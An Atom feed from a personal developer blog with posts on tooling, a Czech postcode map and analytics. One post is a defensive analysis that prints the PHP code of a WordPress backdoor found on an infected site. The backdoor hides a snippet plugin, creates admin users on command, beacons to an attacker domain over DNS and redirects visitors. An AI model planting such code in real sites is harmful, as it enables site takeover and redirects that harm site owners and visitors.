<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" xml:lang="cs"><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://marekrost.cz/feed.xml" rel="self" type="application/atom+xml" /><link href="https://marekrost.cz/" rel="alternate" type="text/html" hreflang="cs" /><updated>2026-03-06T14:29:53+00:00</updated><id>https://marekrost.cz/feed.xml</id><title type="html">Marek Rost</title><subtitle>Personal Blog</subtitle><author><name>Marek Rost</name></author><entry><title type="html">Sequentia PM: Git-Native Project Management for Human-AI Collaboration</title><link href="https://marekrost.cz/sequentia-pm/" rel="alternate" type="text/html" title="Sequentia PM: Git-Native Project Management for Human-AI Collaboration" /><published>2026-03-06T00:00:00+00:00</published><updated>2026-03-06T00:00:00+00:00</updated><id>https://marekrost.cz/sequentia-pm</id><content type="html" xml:base="https://marekrost.cz/sequentia-pm/"><![CDATA[<p>Most project management tools want to be everything for everyone. They pile on features, dashboards, integrations, and collaboration modes until the tool itself becomes the project you need to manage. Meanwhile, the way we build software is shifting: Small teams where a human steers and AI agents do much of the heavy lifting are becoming the norm. <a href="https://github.com/marekrost/sequentia-pm">Sequentia PM</a> is built for exactly this setup.</p>

<h2 id="the-idea">The idea</h2>

<p>Sequentia PM is a desktop application that turns an ordinary folder of numbered files into a full project management workspace. There is no database, no cloud sync, no account to create. Your project is a directory. The files inside it: Markdown, CSV, DBML are the single source of truth, readable by any text editor, diffable by Git, and equally accessible to humans and AI agents alike.</p>

<p>The naming convention is dead simple: prefix each file with a two-digit number and a dash, and Sequentia picks it up as a tab. The GUI application itself is managed by this approach as a demonstration: <code class="language-plaintext highlighter-rouge">00-process.md</code> becomes your process definition, <code class="language-plaintext highlighter-rouge">03-backlog.csv</code> your backlog spreadsheet, <code class="language-plaintext highlighter-rouge">08-models.dbml</code> your entity-relationship diagram. Add a file, get a tab. Remove it, lose the tab. No configuration needed.</p>

<p>This plain-text, file-per-concern layout is not just a design preference, in my opinion it is what makes human-AI collaboration practical. An AI agent can read, edit, and commit project files through the same Git workflow a human uses. No API tokens, no integrations, no special access. The project folder is directly in the shared workspace.</p>

<p>There is another minimalism at play here: the first file in the sequence is your process definition, which doubles as instructions for your AI agent on how you want the project managed. And because the structure carries no assumptions about what you are building, it works just as well for a hardware product, a marketing campaign, or an event plan as it does for software. Swap the process file, adjust the backlog columns, and you have a different methodology for a different domain.</p>

<p>Because everything is just files in a repo, context-switching between projects is trivial. Waiting on a vendor, a customer estimate, or feedback? Commit, switch branches, move on. When it is time to pick up again, the entire project state is right where you left it.</p>

<h2 id="technology-under-the-hood">Technology under the hood</h2>

<p>The stack is deliberately compact:</p>

<ul>
  <li><strong>Electron + React 19 + TypeScript</strong> for the desktop shell</li>
  <li><strong>Monaco Editor</strong> for Markdown and DBML editing with syntax highlighting</li>
  <li><strong>react-data-grid + HyperFormula</strong> for the CSV spreadsheet editor, complete with formulas, sorting, and multi-cell copy/paste</li>
  <li><strong>@softwaretechnik/dbml-renderer</strong> for live SVG entity-relationship diagrams</li>
  <li><strong>Zustand</strong> for state management in roughly 75 lines</li>
  <li><strong>chokidar</strong> for watching external file changes</li>
</ul>

<p>The entire application logic clocks in at around 560 lines of code. The architecture is a clean three-layer sandwich: Electron main process handling privileged file I/O, a sandboxed preload bridge exposing exactly 20 IPC methods, and a React renderer that never touches the filesystem directly.</p>

<p>An <code class="language-plaintext highlighter-rouge">EditorRouter</code> component maps file extensions to purpose-built editors - <code class="language-plaintext highlighter-rouge">.md</code> opens the Markdown editor with a live preview pane, <code class="language-plaintext highlighter-rouge">.csv</code> opens the spreadsheet, <code class="language-plaintext highlighter-rouge">.dbml</code> opens the diagram editor. Everything else gets a polite notice that no editor is available yet.</p>

<h2 id="less-is-more-by-design">Less is more, by design</h2>

<p>What makes Sequentia interesting is not what it does, but what it refuses to do. The project’s design principles spell this out explicitly:</p>

<ul>
  <li><strong>Air-gapped by default.</strong> Zero network calls, zero telemetry, zero CDN fetches. All libraries are bundled at build time. The app works identically on an airplane and behind a corporate firewall.</li>
  <li><strong>No artifacts left behind.</strong> The application creates nothing in your project directory - no <code class="language-plaintext highlighter-rouge">.sequentia/</code> config folder, no lock files, no metadata. It reads and writes only the files you created.</li>
  <li><strong>Open formats only.</strong> Markdown, CSV, and DBML are plain text. Your data stays yours, editable in vim, diffable in Git, greppable from the terminal.</li>
  <li><strong>Single-window simplicity.</strong> One project, one window, one tab bar. No workspaces, no multi-project views, no nesting. The complexity ceiling is deliberately low.</li>
</ul>

<p>This is a conscious rejection of the feature-accumulation treadmill. Instead of asking “what else can we add?”, Sequentia asks “what can we leave out and still have a useful tool?”</p>

<p>The project folder itself is self-documenting. The <code class="language-plaintext highlighter-rouge">00-process.md</code> file defines the entire methodology: file sequence, tiered immutability levels (frozen charters, baselined backlogs, living task lists), and change management rules. The tool and the process it supports are one and the same.</p>

<h2 id="built-for-human-ai-teams">Built for human-AI teams</h2>

<p>Sequentia’s process definition doesn’t just describe the methodology for humans: it explicitly governs AI agents too. The tiered immutability system doubles as a permission model: AI agents can freely update living files like tasks and schedules (Tier 3), must flag proposed changes to baselined backlogs and estimates (Tier 2), and are forbidden from touching frozen process documents and charters (Tier 1) without explicit human approval.</p>

<p>This is a practical answer to a real problem. When an AI agent works on your project, it needs to understand not just the code but the project structure, constraints, and rules. With Sequentia, all of that context lives in the same directory the agent is already working in. Point an agent at the folder, and it has everything it needs - the process, the backlog, the data model, the task list - in formats it can parse without any special tooling.</p>

<p>The result is a lightweight governance layer for human-AI collaboration. The human defines the vision, constraints, and priorities. The AI executes within those boundaries, updates what it is allowed to update, and escalates what it is not. No SaaS platform required - just files, Git, and clear rules.</p>

<h2 id="why-not-just-vs-code">Why not just VS Code?</h2>

<p>Fair question. The files are plain text, so you could open the folder in VS Code and edit everything there. In practice, that means installing a Markdown preview extension, a CSV editor extension, a DBML renderer, hoping they play well together, and accepting whatever UI each one decides to give you. It works, but it is duct tape.</p>

<p>Sequentia gives you a coherent interface out of the box. More importantly, it makes the process sequence visible. The numbered tabs are not just an organizational trick - they represent a dependency chain. A charter comes before a backlog, a backlog comes before estimates, estimates come before a schedule. When a junior PM or developer opens the project, they see this structure immediately and can understand the impact of their changes: touching an early file cascades through everything downstream.</p>

<p>This matters because Sequentia is not just a tool for experienced project managers. It is a learning environment. Junior developers and PMs can use it to understand how structured project management actually works - how a charter constrains a backlog, how a backlog drives estimates, how estimates feed a schedule. The numbered sequence teaches the discipline by making it tangible.</p>

<p>And frankly, that is where this tool finds its sharpest edge. The industry conversation right now is that entire groups of junior developers are becoming replaceable by AI. Sequentia offers an alternative path: instead of competing with AI at writing code, learn to manage projects and direct AI agents. The tool is designed to make that transition accessible - a junior who understands project structure and can steer AI agents effectively is far more valuable than one who only writes code that an LLM can produce faster.</p>

<h2 id="who-is-this-for">Who is this for?</h2>

<p>Sequentia fits small human-AI teams - a developer or two steering the direction, with AI agents handling implementation, research, and routine updates. If you already live in Git and work with coding agents like Claude Code, Cursor, or Copilot, Sequentia gives your project the structure these agents need to be effective contributors rather than isolated tools. It is project management that both you and your AI can read, write, and commit to.</p>

<p>It ships as AppImage, deb, and Flatpak on Linux, with NSIS installer and portable builds for Windows. The project is GPL-3.0 licensed, an early version, but the core feature set is already usable.</p>

<p>Check it out on <a href="https://github.com/marekrost/sequentia-pm">GitHub</a>.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[Most project management tools want to be everything for everyone. They pile on features, dashboards, integrations, and collaboration modes until the tool itself becomes the project you need to manage. Meanwhile, the way we build software is shifting: Small teams where a human steers and AI agents do much of the heavy lifting are becoming the norm. Sequentia PM is built for exactly this setup.]]></summary></entry><entry><title type="html">Moving from Bludit to Jekyll</title><link href="https://marekrost.cz/moving-from-bludit-to-jekyll/" rel="alternate" type="text/html" title="Moving from Bludit to Jekyll" /><published>2026-02-25T00:00:00+00:00</published><updated>2026-02-25T00:00:00+00:00</updated><id>https://marekrost.cz/moving-from-bludit-to-jekyll</id><content type="html" xml:base="https://marekrost.cz/moving-from-bludit-to-jekyll/"><![CDATA[<p>For years this blog ran on <a href="https://www.bludit.com/">Bludit</a>, a flat-file CMS written in PHP. It served me well: no database to manage, simple deployment, and a decent admin UI. However, my workflow has changed significantly over the last two years, and the time has come to move on.</p>

<p>I migrated everything to <a href="https://jekyllrb.com/">Jekyll</a>, a static-site generator written in Ruby. The switch was surprisingly smooth. Since my content was already in Markdown, the migration was mostly about co-locating files, fixing occasional legacy HTML, and normalizing YAML front matter.</p>

<p>A few things I like about the new setup:</p>

<ul>
  <li><strong>Post bundles</strong>: with minor conf adjustments to Jekyll each post now lives in its own directory alongside its images and assets, keeping everything self-contained and easy to manage.</li>
  <li><strong>Full control</strong>: The entire site lives in a Git repository. No admin panel, no PHP runtime, just Markdown and Liquid templating.</li>
  <li><strong>Automated deployment</strong>: A GitHub Actions workflow builds and deploys the site on every push. No server to maintain.</li>
  <li><strong>Lower attack surface</strong>: Without a database or active runtime, there is practically nothing to exploit.</li>
</ul>

<p>The blog is leaner, faster, and easier to work with. If you are running a small personal site and find yourself fighting your CMS more than writing, a static generator might be worth a look.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[For years this blog ran on Bludit, a flat-file CMS written in PHP. It served me well: no database to manage, simple deployment, and a decent admin UI. However, my workflow has changed significantly over the last two years, and the time has come to move on.]]></summary></entry><entry><title type="html">Building mcp-server-spreadsheet: A Data-First MCP Server for Excel</title><link href="https://marekrost.cz/mcp-server-spreadsheet/" rel="alternate" type="text/html" title="Building mcp-server-spreadsheet: A Data-First MCP Server for Excel" /><published>2026-02-24T00:00:00+00:00</published><updated>2026-02-24T00:00:00+00:00</updated><id>https://marekrost.cz/mcp-server-spreadsheet</id><content type="html" xml:base="https://marekrost.cz/mcp-server-spreadsheet/"><![CDATA[<p><strong>UPDATE 2026-03-01:</strong> I’ve extended the functionality to cover .csv, .ods, .xlsx file formats.</p>

<p>I needed a stateless MCP server with dual-mode Excel file access: cell-level and SQL. Nothing quite fit my requirements. As I was forming the specification of what exactly I needed - the simplest path was to build one.</p>

<p>Before writing any code, I sat down and declared what I actually needed: a stateless MCP server that can do both precise cell-level operations and SQL-powered queries on .xlsx files, with both modes working interleaved on the same workbook.</p>

<p>With the spec in hand, I looked at what already exists - mostly utilizing Gemini. I tested <a href="https://github.com/negokaz/excel-mcp-server">excel-mcp-server</a> and <a href="https://github.com/ChrisGVE/localdata-mcp">localdata-mcp</a>. Both are functional, but neither fit. They burned through context window with verbose outputs and long tool descriptions. They also lacked the dual operational mode I was after. When your LLM agent wastes tokens on session management or reformatting data it already has, you feel it in every conversation.</p>

<p>So I built my own. <a href="https://github.com/marekrost/mcp-server-spreadsheet">mcp-server-spreadsheet</a> is a single-file Python server offering 26 tools across two modes:</p>

<ul>
  <li>direct cell operations via openpyxl (read, write, copy, search) and</li>
  <li>a DuckDB-powered SQL interface supporting JOINs, aggregates, and even INSERT/UPDATE/DELETE with atomic writeback.</li>
</ul>

<p>The worksheet mode deals with raw content and ignores styling. The SQL mode is as raw as it can get. Every LLM understands the language out of the box, so why provide plethora of  tools with needless descriptions. Every call is stateless: explicit file and sheet parameters, no handles, no sessions. Writes go through temp files with os.replace() for crash safety. Formulas come back as actual formula strings, not cached values. The design is deliberately minimal: data in, data out, no formatting side-effects, no wasted tokens.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[UPDATE 2026-03-01: I’ve extended the functionality to cover .csv, .ods, .xlsx file formats.]]></summary></entry><entry><title type="html">Interaktivní mapa PSČ České republiky</title><link href="https://marekrost.cz/interaktivni-mapa-psc-ceske-republiky/" rel="alternate" type="text/html" title="Interaktivní mapa PSČ České republiky" /><published>2026-01-16T00:00:00+00:00</published><updated>2026-01-16T00:00:00+00:00</updated><id>https://marekrost.cz/interaktivni-mapa-psc-ceske-republiky</id><content type="html" xml:base="https://marekrost.cz/interaktivni-mapa-psc-ceske-republiky/"><![CDATA[<p>Mapu poštovních směrovacích čísel (PSČ) v České republice nelze jednoduše stáhnout. A platit v dnešní době paušální poplatky za něco, co pravděpodobně zvládnu automatizovat sám s trochou Vibe codingu, mi bylo nepříjemné. A tak vznikl tento <a href="https://mapa-psc.marekrost.cz/">jednodenní projekt</a>.</p>

<h2 id="motivace-a-cíle">Motivace a cíle</h2>

<p>PSČ není oficiální územní jednotka, jde o doručovací atribut přiřazený jednotlivým adresním bodům. Žádná oficiální mapa PSČ tedy neexistuje a Česká pošta se o ni ani nesnaží. V <a href="https://www.tritonit.cz/">Triton IT</a> jsme ji ale potřebovali pro zónování dopravy se zákazníkem. Cílem projektu bylo poskytnout veřejně dostupnou mapu, na které uživatel rychle zjistí, které PSČ pokrývá konkrétní oblast. Bez registrace, bez plateb, bez backendu, čistě statická webová stránka hostovatelná na GitHub Pages.</p>

<p>Jediný spolehlivý zdroj představuje RÚIAN (Registr územní identifikace, adres a nemovitostí) spravovaný ČÚZK. Obsahuje přibližně 3 miliony adresních bodů, každý s přiřazeným PSČ a souřadnicemi v systému S-JTSK. Z těchto bodových dat bylo nutné odvodit plošné hranice jednotlivých PSČ.</p>

<h2 id="hledání-správného-algoritmu">Hledání správného algoritmu</h2>

<h3 id="pokus-první-alpha-shapes-konkávní-obálky">Pokus první: Alpha Shapes (konkávní obálky)</h3>

<p>První verze využívala algoritmus Alpha Shapes - konkávní obálky, které lépe kopírují skutečný tvar zástavby než jednoduchý konvexní obal. Adaptivní parametr alpha se měnil podle hustoty bodů: nižší hodnota pro městskou zástavbu (těsnější obrys), vyšší pro venkovské oblasti.</p>

<p><strong>Problém:</strong> Mezi jednotlivými PSČ vznikaly mezery, tj. „území nikoho”, kde nebyla přiřazena žádná oblast. Vizuálně nepříjemné a prakticky matoucí.</p>

<h3 id="pokus-druhý-delaunay-triangulace">Pokus druhý: Delaunay triangulace</h3>

<p>Druhý přístup použil Delaunayovu triangulaci s filtrováním hran. Umožňoval generovat duté a konkávní tvary, ale mezery mezi PSČ přetrvávaly.</p>

<h3 id="finální-řešení-voronoi-tessellation">Finální řešení: Voronoi tessellation</h3>

<p>Vrátili jsme se k přístupu používanému například v Google Maps. Voronoiův diagram přiřadí každému adresnímu bodu buňku obsahující prostor, který je k němu nejblíže. Buňky se stejným PSČ se sloučí a hranice se vyhladí algoritmem Douglas-Peucker.</p>

<p><strong>Výhody Voronoiho přístupu:</strong></p>

<ul>
  <li>Vyplňuje celý prostor bez mezer</li>
  <li>Hranice jsou přirozené, vedou přesně uprostřed mezi sousedními adresami</li>
  <li>Jasně definované sousedství oblastí</li>
</ul>

<p>Pro osamocené adresy (1-2 body) se použije kruhový buffer jako fallback.</p>

<h2 id="barevné-rozlišení-sousedů">Barevné rozlišení sousedů</h2>

<p>Aby mapa byla čitelná, sousedící PSČ musí mít různé barvy. K tomu slouží Welsh-Powellův hladový algoritmus pro barvení grafů. Výsledkem je paleta pouhých 4 barev (teoreticky podle čtyřbarevné věty), kde žádná dvě sousedící PSČ nemají stejnou barvu.</p>

<h2 id="architektura">Architektura</h2>

<p>Projekt je rozdělen na dvě části:</p>

<ol>
  <li><strong>Offline ETL pipeline</strong> (Python) - výpočetně náročné zpracování dat</li>
  <li><strong>Statická webová prezentace</strong> - vektorové dlaždice (MVT) + MapLibre GL JS</li>
</ol>

<p>Data se transformují ze souřadnic S-JTSK do WGS84, generují se polygony a následně vektorové dlaždice pomocí nástroje tippecanoe. Výstupem je složka se statickými soubory, kterou lze nahrát na jakýkoliv hosting.</p>

<h2 id="závěr">Závěr</h2>

<p>Po třech iteracích algoritmu jsme konvergovali k Voronoiho tessellaci jako nejlepšímu řešení pro odvození hranic PSČ z bodových dat. Mapa je nyní dostupná na <a href="https://mapa-psc.marekrost.cz/">mapa-psc.marekrost.cz</a> a <a href="https://github.com/marekrost/mapa-psc">zdrojový kód</a> je otevřený pod licencí GPL-3.0.</p>

<p>Zobrazené hranice jsou z principu aproximací. Skutečná příslušnost k PSČ je vždy definována pouze pro konkrétní adresní místa. Mapa slouží k orientaci a vizualizaci, nikoliv jako oficiální podklad.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[Mapu poštovních směrovacích čísel (PSČ) v České republice nelze jednoduše stáhnout. A platit v dnešní době paušální poplatky za něco, co pravděpodobně zvládnu automatizovat sám s trochou Vibe codingu, mi bylo nepříjemné. A tak vznikl tento jednodenní projekt.]]></summary></entry><entry><title type="html">WP backdoors delivered via code snippets</title><link href="https://marekrost.cz/wp-backdoors-via-code-snippets/" rel="alternate" type="text/html" title="WP backdoors delivered via code snippets" /><published>2024-07-22T00:00:00+00:00</published><updated>2024-07-22T00:00:00+00:00</updated><id>https://marekrost.cz/wp-backdoors-via-code-snippets</id><content type="html" xml:base="https://marekrost.cz/wp-backdoors-via-code-snippets/"><![CDATA[<p>We have recently encountered a creative way to hide exploits on WP sites by using plugins that provide custom PHP code snippets. This article should serve as a warning why such plugins are automatically a security risk and should be avoided on all Wordpress sites whenever possible.</p>

<h2 id="process-of-the-attack">Process of the Attack</h2>

<ol>
  <li><strong>Initial Access</strong>: The attacker leverages admin-level privileges, potentially obtained through existing exploits or vulnerabilities, to install a code snippet plugin from the official source on WordPress.org.</li>
  <li><strong>Concealment</strong>: The attack generates a code snippet that conceals the presence of the plugin. This is achieved by masking all related information via CSS and by immediately unloading the plugin using a WordPress action hook.</li>
  <li><strong>Execution</strong>: The malicious payload is automatically executed on every page request.</li>
</ol>

<h2 id="example-of-backdoor-code">Example of backdoor code</h2>

<p>We’ve lifted the following demonstration out of an infected website. The code has been slightly modified and clarifications added.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Attacker's personal password
$_pwsa = 'password_string';

// Hide the presence of the WPCode plugin
if (current_user_can('administrator') &amp;&amp; !array_key_exists('show_all', $_GET)) {
  add_action('admin_print_scripts', function () {
    echo '&lt;style&gt;';
    ...
    echo '&lt;/style&gt;';
  });
  add_filter('all_plugins', function ($plugins) {
    unset($plugins['insert-headers-and-footers/ihaf.php']);
    return $plugins;
  });
}

if (!function_exists('_red')) {

  // Helper function, extract base64-encoded cookie values
  function _gcookie($n) {
    return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : '';
  }

  // Exploit control section
  // Test if visiting browser has the password cookie set to correct value
  if (!empty($_pwsa) &amp;&amp; _gcookie('pw') === $_pwsa) {

    // Command options
    switch (_gcookie('c')) {

      // Update domain storage hidden within wordpress option
      case 'sd':
        $d = _gcookie('d');
        if (strpos($d, '.') &gt; 0) {
          update_option('d', $d);
        }
        break;

      // Add administrator user to the WP site
      // username, password and e-mail fields are defined by u,p,e cookies
      case 'au':
        $u = _gcookie('u');
        $p = _gcookie('p');
        $e = _gcookie('e');
        if ($u &amp;&amp; $p &amp;&amp; $e &amp;&amp; !username_exists($u)) {
          $user_id = wp_create_user($u, $p, $e);
          $user = new WP_User($user_id);
          $user-&gt;set_role('administrator');
        }
        break;
    }
    return;
  }

  // Skip further code on the login page to avoid detection
  if (@stripos(wp_login_url(), ''.$_SERVER['SCRIPT_NAME']) !== false) { return; }

  // Skip further code if specific cookie is present
  if (_gcookie("skip") === "1") { return; }

  // Helper functions
  function _is_mobile() { ... }
  function _is_iphone() { ... }
  function _user_ip()   { ... }

  function _red() {

    // Do nothing for logged in users to avoid detection
    if (is_user_logged_in()) { return; }

    // Do nothing if IP is not set, likely to avoid detection when run via tool like WP CLI
    $ip = _user_ip(); if (!$ip) { return; }

    // Get WP transient option that stores list of visitor IP addresses
    $exp = get_transient('exp'); if (!is_array($exp)) { $exp = array(); }

    // Remove IP address from the list if 24 hours have passed since the last visit
    foreach ($exp as $k =&gt; $v) { if (time() - $v &gt; 86400) { unset($exp[$k]); } }

    // Do nothing more if IP address has visited within last 24 hours
    if (key_exists($ip, $exp) &amp;&amp; (time() - $exp[$ip] &lt; 86400)) { return; }

    // Save website hostname and ip address of the visitor
    $host = filter_var(parse_url('https://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
    $ips = str_replace(':', '-', $ip); $ips = str_replace('.', '-', $ips);

    // Take attacker's contact domain out of WP option
    $h = 'cdn-routing.com';
    $o = get_option('d');
    if ($o &amp;&amp; strpos($o, '.') &gt; 0) { $h = $o; }

    // Prepare DNS request - package info about the current website into subdomains
    $m = _is_iphone() ? 'i' : 'm'; $req = (!$host ? 'unk.com' : $host) . '.' . (!$ips ? '0-0-0-0' : $ips) . '.' . mt_rand(100000, 999999) . '.' . (_is_mobile() ? 'n' . $m : 'nd') . '.' . $h;

    // Send the DNS request: get redirect URL and provide heartbeat
    $s = null;
    try {
      $v = "d" . "ns_" . "get" . "_rec" . "ord";
      $s = @$v($req, DNS_TXT);
    } catch (\Throwable $e) { } catch (\Exception $e) { }

    // Redirect visitor to the domain name in the attacker's DNS TXT record
    // Log the IP into storage
    if (is_array($s) &amp;&amp; !empty($s)) {
      if (isset($s[0]['txt'])) {
        $s = $s[0]['txt'];
        $s = base64_decode($s);
        if ($s == 'err') {
          $exp[$ip] = time();
          delete_transient('exp');
          set_transient('exp', $exp);
        } else if (substr($s, 0, 4) === 'http') {
          $exp[$ip] = time();
          delete_transient('exp');
          set_transient('exp', $exp);
          wp_redirect($s);
          exit;
        }
      }
    }
  }
  add_action('init', '_red');
}
</code></pre></div></div>

<p>The code shown above grants attacker an ability to redirect visitors of the website to any other domain that he wishes. The backdoor allows switching of the control domain in order to allow migration of the attacker’s own infrastructure. Finally, the attacker can, at any point, create his own Admin-level user on the website and use it at his leisure - possibly improving the backdoor or adding more malicious code.</p>

<h2 id="thoughts-on-detection">Thoughts on detection</h2>

<p>This kind of malicious code can be much more difficult to locate than exploits embedded within code as the latter can be simply identified by tracking file differences.</p>

<p>Basic security tools don’t scan WP database or they don’t do so sufficiently well. We have tested if the code shown earlier would get detected by Wordfence. It wouldn’t. This means that exploits hidden within snippet plugins easily escape automated detection.</p>

<p>In this particular case the detection can be as simple as comparing the list of available installed plugins to the contents of wp-content/plugins/ folder. Should the folder contain any plugin slugs that do not correspond to what is available inside Wordpress administration, detailed investigation should follow. This is, however, something that can hardly get automated due to the exploit’s different behavior when running via CLI tool.</p>

<p>The easiest approach to detection could simply be maintaining a plugin graylist. A list of potentially exploitable plugins that, when installed, require additional review.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[We have recently encountered a creative way to hide exploits on WP sites by using plugins that provide custom PHP code snippets. This article should serve as a warning why such plugins are automatically a security risk and should be avoided on all Wordpress sites whenever possible.]]></summary></entry><entry><title type="html">selenium-wire: How to resolve No module named blinker._saferef</title><link href="https://marekrost.cz/selenium-wire-how-to-resolve-blinker-saferef/" rel="alternate" type="text/html" title="selenium-wire: How to resolve No module named blinker._saferef" /><published>2024-05-01T00:00:00+00:00</published><updated>2024-05-01T00:00:00+00:00</updated><id>https://marekrost.cz/selenium-wire-how-to-resolve-blinker-saferef</id><content type="html" xml:base="https://marekrost.cz/selenium-wire-how-to-resolve-blinker-saferef/"><![CDATA[<p>Out of nowhere all of our Python projects that utilize selenium-wire suddenly stopped working when redeployed. It turns out that <strong>selenium-wire</strong> is no longer maintained as of January 2024 and the project depends on package <strong>blinker</strong>, specifically file <strong>blinker._saferef</strong> that is no longer available in latest blinker versions 1.8.0 and 1.8.1.</p>

<p>The solution is to add direct dependency on blinker&lt;1.8.0 into your project in order to prevent selenium-wire from automatically downloading the latest blinker version.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[Out of nowhere all of our Python projects that utilize selenium-wire suddenly stopped working when redeployed. It turns out that selenium-wire is no longer maintained as of January 2024 and the project depends on package blinker, specifically file blinker._saferef that is no longer available in latest blinker versions 1.8.0 and 1.8.1.]]></summary></entry><entry><title type="html">Managing zip files with PHP composer</title><link href="https://marekrost.cz/managing-zip-files-with-php-composer/" rel="alternate" type="text/html" title="Managing zip files with PHP composer" /><published>2024-02-06T00:00:00+00:00</published><updated>2024-02-06T00:00:00+00:00</updated><id>https://marekrost.cz/managing-zip-files-with-php-composer</id><content type="html" xml:base="https://marekrost.cz/managing-zip-files-with-php-composer/"><![CDATA[<p>We have recently moved all Wordpress-based development in Triton IT to Bedrock by Roots.io. One of the perks of this system is the ability to manage all external code with PHP composer. What is the only caveat?</p>

<p>It’s the management of non-public external code or private packages. Particularly paid Wordpress plugins turned out to be annoying. We somehow needed them versioned and managed while not commiting them directly to our own code repository.</p>

<p>While looking for a solution - I have found <a href="https://github.com/Rarst/release-belt">Release Belt</a>, a nice little application that can manage ZIP files as if they were composer packages.</p>

<p>Unfortunately Release Belt was not available as a Docker image and in <a href="https://www.tritonit.cz/">Triton IT</a> we run all of our key infrastructure in containers. With the assistance of my teammates I have <a href="https://github.com/marekrost/docker-release-belt">packaged Release Belt into a docker image</a> and made it available directly from <a href="https://hub.docker.com/r/marekrost/release-belt">Docker hub</a>.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[We have recently moved all Wordpress-based development in Triton IT to Bedrock by Roots.io. One of the perks of this system is the ability to manage all external code with PHP composer. What is the only caveat?]]></summary></entry><entry><title type="html">Google Looker Studio - Blending Google Analytics 4 and Google Ads the right way</title><link href="https://marekrost.cz/google-looker-studio-blending-ga4-and-google-ads-right-way/" rel="alternate" type="text/html" title="Google Looker Studio - Blending Google Analytics 4 and Google Ads the right way" /><published>2023-09-14T00:00:00+00:00</published><updated>2023-09-14T00:00:00+00:00</updated><id>https://marekrost.cz/google-looker-studio-blending-ga4-and-google-ads-right-way</id><content type="html" xml:base="https://marekrost.cz/google-looker-studio-blending-ga4-and-google-ads-right-way/"><![CDATA[<p><strong>Dimension</strong> names are deceptive. Just because they have the same name both in GA4 and Ads, it does not mean they follow the same convention of data formatting. To blend successfully, you have to make sure both <strong>Dimensions</strong> have the same data format. Watch out for source data granularity.</p>

<p>Quite some time has passed since my <a href="/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly">last entry</a> on a similar topic. So much time, that Google Data Studio has renamed itself. This time I will be looking at data blending from Google Ads with GA4 using time-based <strong>Dimensions</strong>.</p>

<p>In order to successfully blend data from GA4 and Ads, while keeping a meaningful intersection (this means using Left / Right outer join, or Inner join), we naturally need to apply a meaningful Join condition - a set of compatible fields that will be shared between both source Tables.</p>

<p>At first glance this seems like a sensible assumption, however, I have ran into surprising issues. Let’s have a look at a specific example: Joining Tables using dimension <strong>Year</strong>.</p>

<p><img src="looker-studio-inner-join-year.png" alt="Inner join setup in Looker Studio between GA4 and Google Ads using the Year dimension" /></p>

<p>The left table is from Google Analytics 4 and right table from Google Ads. A simple relationship with two same dimensions provided by two systems from the same company. What could go wrong?</p>

<p>I have ended up with <em>User Configuration Error</em> after finishing this setup of Blended data.  The error description - a cryptic line: <em>This data source was improperly configured.</em></p>

<p>So what went wrong? While technically storing the same data - both <strong>Year</strong> dimensions have a different formatting. Let’s introduce a new term and call this formatting <strong>Native formatting</strong>. Unless two dimensions have the same Native formatting - they cannot be used to blend data successfully, even if they supposedly store the same type of information with the same granularity.</p>

<p>It is possible to reveal the Native formatting by using the <code class="language-plaintext highlighter-rouge">CAST(Dimension AS TEXT)</code> function and displaying the result in a Table chart. The following table lists key time-based Dimensions from Google Ads and Analytics 4 with value examples.</p>

<table>
  <thead>
    <tr>
      <th><strong>Data source</strong></th>
      <th><strong>Dimension</strong></th>
      <th><strong>Granularity</strong></th>
      <th><strong>CAST() example values</strong></th>
      <th><strong>Compatible dimensions</strong></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Google Analytics 4</td>
      <td><strong>Year</strong></td>
      <td>Year</td>
      <td>2023-01-01 / 2024-01-01 / 2025-01-01</td>
      <td>N/A</td>
    </tr>
    <tr>
      <td>Google Ads</td>
      <td><strong>Year</strong></td>
      <td>Year</td>
      <td>2023 / 2024 / 2025</td>
      <td>N/A</td>
    </tr>
    <tr>
      <td>Google Analytics 4</td>
      <td><strong>Month</strong></td>
      <td>Month</td>
      <td>1 / 2 / 3</td>
      <td>N/A</td>
    </tr>
    <tr>
      <td>Google Ads</td>
      <td><strong>Month</strong></td>
      <td>Month</td>
      <td>2023-01-01 / 2023-02-01 / 2023-03-01</td>
      <td><strong>GA4: Year month</strong></td>
    </tr>
    <tr>
      <td>Google Analytics 4</td>
      <td><strong>Year month</strong></td>
      <td>Month</td>
      <td>2023-01-01 / 2023-02-01 / 2023-03-01</td>
      <td><strong>Ads: Month</strong></td>
    </tr>
    <tr>
      <td>Google Analytics 4</td>
      <td><strong>Date</strong></td>
      <td>Day</td>
      <td>2023-01-01 / 2023-01-02 / 2023-01-03</td>
      <td><strong>Ads: Day</strong></td>
    </tr>
    <tr>
      <td>Google Ads</td>
      <td><strong>Day</strong></td>
      <td>Day</td>
      <td>2023-01-01 / 2023-01-02 / 2023-01-03</td>
      <td><strong>GA4: Date</strong></td>
    </tr>
  </tbody>
</table>

<p><strong>Table 1:</strong> Most common time-based dimensions and their Native formatting in Google Ads and Analytics 4. Including information which dimensions are compatible.</p>

<p>This reveals that <strong>Year</strong> dimension from Google Ads is not compatible with <strong>Year</strong> dimension from Google Analytics. From the first glance it could be tempting to use <strong>GA4: Year</strong> with <strong>Ads: Month</strong> or <strong>Ads: Day</strong> but that would be a bad idea: they do not preserve the same data granularity. Meaning: that Metrics data from one system would be aggregated into sets of different size than data from the second system. This could lead to incorrect numbers in Looker studio Charts. It is, in fact, exactly the same situation as described in my older <a href="/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly">article on Google Data Studio</a>.</p>

